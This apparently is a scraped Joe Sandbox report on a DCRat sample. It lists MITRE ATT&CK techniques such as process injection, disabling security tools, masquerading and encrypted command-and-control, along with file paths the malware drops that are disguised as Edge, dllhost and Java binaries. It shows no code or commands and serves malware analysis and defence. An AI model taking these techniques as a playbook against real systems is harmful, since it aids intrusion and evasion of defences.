Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4t8f8F3uT1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Java\jre-1.8\bin\6ccacd8608530f

C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe

C:\Program Files (x86)\Microsoft\Edge\Application\CSC5F50EFF8B17D43B99D465AE8464D9.TMP

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

C:\Program Files (x86)\Windows Portable Devices\466f9f2ea1ce8d

C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe

C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\466f9f2ea1ce8d

C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe

C:\Program Files\Windows Security\BrowserCore\5940a34987c991

C:\Program Files\Windows Security\BrowserCore\dllhost.exe

C:\Users\Default\Pictures\69ddcba757bf72

Windows Analysis Report
4t8f8F3uT1.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre